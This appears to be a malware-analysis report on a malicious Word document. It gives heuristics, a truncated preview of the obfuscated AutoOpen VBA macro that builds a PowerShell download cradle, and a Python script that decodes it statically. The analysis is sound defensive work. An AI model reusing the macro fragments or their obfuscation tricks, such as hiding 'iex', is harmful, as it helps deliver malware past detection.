Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 User Execution: Malicious File
The sample is a malicious Office document carrying a VBA macro. The macro is wired to run automatically when the document is opened (AutoOpen) and calls Shell() to launch an external command. The decoded source is heavily obfuscated: variable and function names are random, most statements either build arrays of StrReverse() calls over throwaway literals (apparent decoy noise) or extract a substring with Mid() from a junk-padded literal, and the Mid() fragments contain PowerShell-style text once the padding seams ("'+'", "GBn+GBn", "i6V+i6V") are removed: for example WebClient, new-object, .Replace() calls with [ChAr]92 and [ChAr]39, and, if Mq5 stands for $ and GBn for a quote as the visible Replace() pattern suggests, the expression $ShellId[1]+$ShellId[13]+'X', which spells iex from the characters of "Microsoft.PowerShell" without writing it. Taken together this points to a Shell()-launched PowerShell download cradle that fetches and runs a second-stage payload, a common delivery technique. The ClamAV signature (Doc.Macro.Obfuscation-6387400-0) and the heuristic firings support this assessment. Two caveats for the analyst: the only extracted URL is the DrawingML schema namespace and is not a network indicator, and the OLE_LEGACY_WORDBASIC_AUTOEXEC finding states that no modern VBA project was recovered even though olevba decoded 90,593 bytes of VBA source, so it should be read as corroborating the AutoOpen entry point rather than as independent evidence.
Heuristics (7)

| Heuristic | Severity | ID | Description |
|---|---|---|---|
| ClamAV: Doc.Macro.Obfuscation-6387400-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Macro.Obfuscation-6387400-0 |
| VBA macros detected (3 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | AutoOpen macro |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC | OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace, not a network indicator. |
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 90593 bytes | 1bb78b992d1cf6bb82254558a121fea0a520b3ae1f5e8cf0b8fe0745a24352dc |
Preview (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "EPjatGzZtht"
Function jzaNvClIBfMn()
SwlNG = Array(StrReverse("JijhURqUnjnn"), StrReverse("tFwUfSj"), StrReverse("icYjpwKWQiSRT"), StrReverse("ttUYtvMTYjuC"), StrReverse("IIDfOjt"), StrReverse("GKwiSjwXwUW"), StrReverse("GMEzHZnbLDoo"), StrReverse("sBNNCEkZHmjWt"))
iLQhN = Mid("7U68ws2sjAsJiVBn+GBnyGBn+GBn+GBnPkarapGBn+GBnas GBn+G'+'Bn+GBn+GBn '+'i6V+i6VIGBn+'+'GXnCpT1dki", 15, 68)
RrjFwwSocw = Array(StrReverse("ETzpTMjd"), StrReverse("SErrHAGa"), StrReverse("fjiJCEq"), StrReverse("jukJlDvPiwNQPz"), StrReverse("ZmUBqhcWYdV"), StrReverse("lhvRszYdot"), StrReverse("hBwbdBsKmhGFWi"), StrReverse("AOHXLjP"))
BbfVk = Array(StrReverse("POwaPYVzwDD"), StrReverse("otRTDVJrZf"), StrReverse("JvPlGzZVdOwY"), StrReverse("PcZQRsFK"), StrReverse("iPqInjNM"), StrReverse("AjimfAm"), StrReverse("AWhZJqVEE"), StrReverse("wtahZZzRzvw"))
YJzLdOzRnMz = Array(StrReverse("clmpsoXukOTDws"), StrReverse("zLVSRzURoCWN"), StrReverse("QmnXitbRr"), StrReverse("PiujiGuviUb"), StrReverse("qXSiBITwn"), StrReverse("bIdzawUERQ"), StrReverse("jFjWQmLt"), StrReverse("ntnAwQEE"))
FmkHQ = Mid("wvjznjlEiijLscGBn+GBnh{GB'+'n+GBnwGBn+GBnrGBn+GBniteGBn+GBn-'+'GBn+GBnhoj80pOdcZ", 14, 59)
ICPnaYzWzU = Array(StrReverse("qIQNzoid"), StrReverse("ZdCridkVZVDjIQ"), StrReverse("bTJEnOArQp"), StrReverse("ZJwtjWbiXPXp"), StrReverse("wPwaZvbhrwmdi"), StrReverse("qiYmmCBEaYf"), StrReverse("jIitEDiSIXRaS"), StrReverse("NwhMKPCslv"))
Arlfi = Array(StrReverse("TwtpuHmCkfwai"), StrReverse("KIGSjHl"), StrReverse("HEfhhUdBKr"), StrReverse("MzSOuLbjO"), StrReverse("jvhJqcr"), StrReverse("zUzGzqoKMZRZj"), StrReverse("GKRFstMHIX"), StrReverse("TbJzXrslLN"))
bNiYWRV = Array(StrReverse("mIcRAokZ"), StrReverse("pjDZFznMjFMQuw"), StrReverse("nIjpEaUsOk"), StrReverse("BqaBGSfirwQF"), StrReverse("jSGVXltsJCirEv"), StrReverse("XVrppUvwli"), StrReverse("ulLHcXDpFlTwUc"), StrReverse("ssowKCWKLVFaP"))
ERhNFjC = Mid("0Gi'+'GBn+GBnPhuGBn+GBni6V+i6Vas = fGBn+GBnyPenGBn+GBnvi6V+i6V:public + IOGBn+'+'GBnWG4kGBn+Gi6V+i6VBnIOW GBn+'+'GBn+GBn+GBn fGju8VFl6i0wzA7l1z", 4, 124)
vrTGTwVI = Array(StrReverse("SFAbZkwBSp"), StrReverse("LoXslkwcq"), StrReverse("ZjiOfMoi"), StrReverse("nXHjrLFQTc"), StrReverse("GFhAQVaf"), StrReverse("HnjWKtW"), StrReverse("MuXKTsBuDE"), StrReverse("jjTizhGTCdw"))
fEGjWTFNX = Array(StrReverse("nWVqYrIjCZ"), StrReverse("nOqiEXWM"), StrReverse("cDIpUwXaAlXwnP"), StrReverse("PwHwliLqP"), StrReverse("WnjcGwjNRzjOf"), StrReverse("bThfQCKzzY"), StrReverse("FPZbQQNtz"), StrReverse("IrwtnniWShBSlU"))
dDwEFUJiJ = Array(StrReverse("qqiSjNSzfAZSjn"), StrReverse("rcSDzXAZNWk"), StrReverse("lGMnBKnG"), StrReverse("GrMkZwOXKOYIC"), StrReverse("YwzUbqRUwwDjr"), StrReverse("MYHwhllkG"), StrReverse("XbmCCHMBj"), StrReverse("opBqLPamv"))
pZsYwLZpa = Mid("4GGm).RePlace'+'(GBi6V+i6VnG4kGBn,[sTi6V+i6VrING][ChAr]92).RePlace(GBnIOWGBn,[sTrING][ChAr]39) fAR .'+' ( Mq5ShELi6V+i6VlId[1]+Mq5SHELliD[13]+GBnXi6V+i6VGBn)i6V).REplaCE(i6VfARi6M48OO7hlm", 5, 174)
tGabaNNw = Array(StrReverse("AfZMiWoHJ"), StrReverse("iJmBhWU"), StrReverse("XSbjmcOcdhq"), StrReverse("niFJPknjV"), StrReverse("UjpsEivVkLj"), StrReverse("NBqRtzwCsHQr"), StrReverse("EEdlwioKv"), StrReverse("sutXkjIwfkAQDS"))
XJVoAvW = Array(StrReverse("htEvKmHbb"), StrReverse("HorjwAEOR"), StrReverse("mBzddXXRkSKzo"), StrReverse("miWqrQAlaSGzz"), StrReverse("tLLLUGbfvb"), StrReverse("nPqqJGIzw"), StrReverse("SdOXBoBbiXiZCX"), StrReverse("GwiiRGjuYE"))
BNkQP = Array(StrReverse("dwNFvHoFsDot"), StrReverse("XKTMaDDXCWH"), StrReverse("jdDbFAt"), StrReverse("DqwkYNfz"), StrReverse("ioIXbRZwj"), StrReverse("ZIOaZGCPikd"), StrReverse("CvnXhNjnNXGG"), StrReverse("hwfEMdiZVU"))
BWNpcbLr = Mid("Qb8dVGfGBn+GBnet.WebGBn+GBnCliGBn+GBnent;fyPn'+'sG'+'Bn+GBnadaGBn+GB'+'nsGBn+GBnd GBn+GBn= new-oi6V+i6VbjGBn+GBnect ranGBn+GBi6V+i6VndGBn+GBnomGBn+GBn;
```

... (truncated)
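As an added example for the string-building pattern in the preview above (not code from the report, the analyzer, or the sample): a small Python decoder that statically evaluates the macro's StrReverse() and Mid() calls and strips the padding seams, without ever executing the VBA. The three seam tokens are taken from the preview as they appear. Mapping GBn to a single quote and Mq5 to $ is an analyst assumption inferred from the visible .RePlace(GBnIOWGBn,[sTrING][ChAr]39) call, and resolving $ShellId[n] assumes Windows PowerShell's value "Microsoft.PowerShell". The sample input is the FmkHQ line and a shortened SwlNG line copied from the preview, plus two constructed lines (cmdA, cmdB) that mirror the truncated WebClient and ShellId fragments with known Mid() offsets.

```python
"""Static decoder for the StrReverse()/Mid() string-building pattern in the
macro preview. Added example, not code from the report or the sample: it never
executes the VBA, it only evaluates the two string functions the macro leans on
and strips the padding seams that split PowerShell-looking text."""
import re

# Seam tokens observed in the preview. Order matters: "'+'" is spliced into the
# middle of the other seams (e.g. "GB'+'n+GBn"), so it must be removed first.
SEAMS = ["'+'", "i6V+i6V", "GBn+GBn"]

# ASSUMPTION (analyst inference, not established by the report): the visible
# .RePlace(GBnIOWGBn,[sTrING][ChAr]39) call puts GBn exactly where PowerShell
# needs a quote, and Mq5 sits where $ would precede a variable (Mq5ShELlId).
PLACEHOLDERS = {"GBn": "'", "Mq5": "$"}

# $ShellId is "Microsoft.PowerShell" in Windows PowerShell; index 1 is 'i' and
# index 13 is 'e', which is how $ShellId[1]+$ShellId[13]+'x' spells "iex".
SHELLID = "Microsoft.PowerShell"

STRREVERSE_RE = re.compile(r'StrReverse\("([^"]*)"\)')
MID_RE = re.compile(r'Mid\("([^"]*)",\s*(\d+),\s*(\d+)\)')
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.*)$')
SHELLID_RE = re.compile(r'\$ShellId\[(\d+)\]', re.IGNORECASE)


def vba_mid(s, start, length):
    """VBA Mid(): 1-based start, at most `length` characters."""
    return s[start - 1:start - 1 + length]


def strip_seams(s, seams=SEAMS):
    for seam in seams:
        s = s.replace(seam, "")
    return s


def decode_fragment(raw):
    """Turn one Mid() result into readable PowerShell-style text."""
    s = strip_seams(raw)
    for token, real in PLACEHOLDERS.items():
        s = s.replace(token, real)
    # $ShellId[n] -> the quoted character it indexes.
    s = SHELLID_RE.sub(lambda m: "'" + SHELLID[int(m.group(1))] + "'", s)
    # Quotes introduced above create new 'a'+'b' seams; collapse them too.
    return strip_seams(s, ["'+'"])


def decode_macro(source):
    """Map each evaluable assignment to its value: a list of reversed strings
    for Array(StrReverse(...), ...) lines, a substring for Mid(...) lines."""
    values = {}
    for line in source.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        name, rhs = m.group(1), m.group(2)
        mid = MID_RE.search(rhs)
        if mid:
            values[name] = vba_mid(mid.group(1), int(mid.group(2)), int(mid.group(3)))
            continue
        revs = STRREVERSE_RE.findall(rhs)
        if revs:
            values[name] = [r[::-1] for r in revs]
    return values


def recovered_fragments(source):
    """(variable, decoded text) for every Mid() line, in source order. Joined in
    that order they approximate the assembled script; the real join order is
    decided by macro code that the preview does not show."""
    return [(name, decode_fragment(v))
            for name, v in decode_macro(source).items() if isinstance(v, str)]


# Sample input: the FmkHQ and (shortened) SwlNG lines are copied from the
# preview above; cmdA and cmdB are CONSTRUCTED here to mirror the truncated
# WebClient and ShellId fragments with known Mid() offsets.
SAMPLE_VBA = '''
SwlNG = Array(StrReverse("JijhURqUnjnn"), StrReverse("tFwUfSj"))
FmkHQ = Mid("wvjznjlEiijLscGBn+GBnh{GB'+'n+GBnwGBn+GBnrGBn+GBniteGBn+GBn-'+'GBn+GBnhoj80pOdcZ", 14, 59)
cmdA = Mid("XXXXXnew-oi6V+i6VbjGBn+GBnect NGBn+GBnet.WebGBn+GBnCliGBn+GBnentYYYY", 6, 59)
cmdB = Mid("ab( Mq5ShELi6V+i6VlId[1]+Mq5SHELliD[13]+GBnXi6V+i6VGBn)cd", 3, 53)
'''

if __name__ == "__main__":
    for name, text in recovered_fragments(SAMPLE_VBA):
        print(f"{name:10s} {text}")
```

Run against the full macros.bas, the decoder yields one fragment per Mid() line; the StrReverse() arrays decode to strings with no apparent meaning and are best treated as noise until the macro body shows them being used. The `( 'ieX')` result for cmdB is the tail of the `. ( $ShellId[1]+$ShellId[13]+'X')` construction visible in the pZsYwLZpa line, which dot-invokes Invoke-Expression without the string "iex" ever appearing in the document.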